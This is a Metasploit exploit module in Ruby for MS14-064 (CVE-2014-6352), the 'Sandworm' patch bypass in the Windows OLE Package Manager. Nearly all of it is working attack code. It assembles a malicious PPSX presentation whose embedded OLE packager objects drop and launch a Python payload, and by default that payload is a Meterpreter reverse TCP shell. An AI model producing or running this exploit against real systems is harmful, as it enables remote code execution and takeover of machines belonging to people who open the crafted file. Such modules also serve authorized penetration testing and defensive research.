MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python

`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::FILEFORMAT  
include Msf::Exploit::EXE  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",  
'Description' => %q{  
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)  
allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability  
publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista  
SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.  
However, based on our testing, the most reliable setup is on Windows platforms running  
Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as  
those using Office 2010 SP1 may be less stable, and may end up with a crash due to a  
failure in the CPackage::CreateTempFileName function.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Haifei Li', # Vulnerability discovery and exploit technique  
'sinn3r', # Metasploit module  
'juan vazquez' # Metasploit module  
],  
'References' =>  
[  
['CVE', '2014-6352'],  
['MSB', 'MS14-064'],  
['BID', '70690'],  
['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm']  
],  
'Platform' => 'python',  
'Arch' => ARCH_PYTHON,  
'Targets' =>  
[  
['Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013', {}],  
],  
'Privileged' => false,  
'DefaultOptions' =>  
{  
'Payload' => 'python/meterpreter/reverse_tcp'  
},  
'DisclosureDate' => "Nov 12 2014",  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx'])  
], self.class)  
end  
  
def exploit  
print_status("Creating '#{datastore['FILENAME']}' file ...")  
payload_packager = create_packager('tabnanny.py', payload.encoded)  
trigger_packager = create_packager("#{rand_text_alpha(4)}.py", rand_text_alpha(4 + rand(10)))  
zip = zip_ppsx(payload_packager, trigger_packager)  
file_create(zip)  
end  
  
def zip_ppsx(ole_payload, ole_trigger)  
zip_data = {}  
data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template')  
  
Dir["#{data_dir}/**/**"].each do |file|  
unless File.directory?(file)  
zip_data[file.sub(data_dir,'')] = File.read(file)  
end  
end  
  
# add the otherwise skipped "hidden" file  
file = "#{data_dir}/_rels/.rels"  
zip_data[file.sub(data_dir,'')] = File.read(file)  
  
# put our own OLE streams  
zip_data['/ppt/embeddings/oleObject1.bin'] = ole_payload  
zip_data['/ppt/embeddings/oleObject2.bin'] = ole_trigger  
  
# create the ppsx  
ppsx = Rex::Zip::Archive.new  
zip_data.each_pair do |k,v|  
ppsx.add_file(k,v)  
end  
  
ppsx.pack  
end  
  
def create_packager(file_name, contents)  
file_info = [2].pack('v')  
file_info << "#{file_name}\x00"  
file_info << "#{file_name}\x00"  
file_info << "\x00\x00"  
  
extract_info = [3].pack('v')  
extract_info << [file_name.length + 1].pack('V')  
extract_info << "#{file_name}\x00"  
  
file = [contents.length].pack('V')  
file << contents  
  
append_info = [file_name.length].pack('V')  
append_info << Rex::Text.to_unicode(file_name)  
append_info << [file_name.length].pack('V')  
append_info << Rex::Text.to_unicode(file_name)  
append_info << [file_name.length].pack('V')  
append_info << Rex::Text.to_unicode(file_name)  
  
ole_data = file_info + extract_info + file + append_info  
ole_contents = [ole_data.length].pack('V') + ole_data  
  
ole = create_ole("\x01OLE10Native", ole_contents)  
  
ole  
end  
  
def create_ole(stream_name, data)  
ole_tmp = Rex::Quickfile.new('ole')  
stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)  
  
stm = stg.create_stream(stream_name)  
stm << data  
stm.close  
  
directory = stg.instance_variable_get(:@directory)  
directory.each_entry do |entry|  
if entry.instance_variable_get(:@_ab) == 'Root Entry'  
# 0003000C-0000-0000-c000-000000000046 # Packager  
clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")  
entry.instance_variable_set(:@_clsId, clsid)  
end  
end  
  
# write to disk  
stg.close  
  
ole_contents = File.read(ole_tmp.path)  
ole_tmp.close  
ole_tmp.unlink  
  
ole_contents  
end  
  
end  
  
`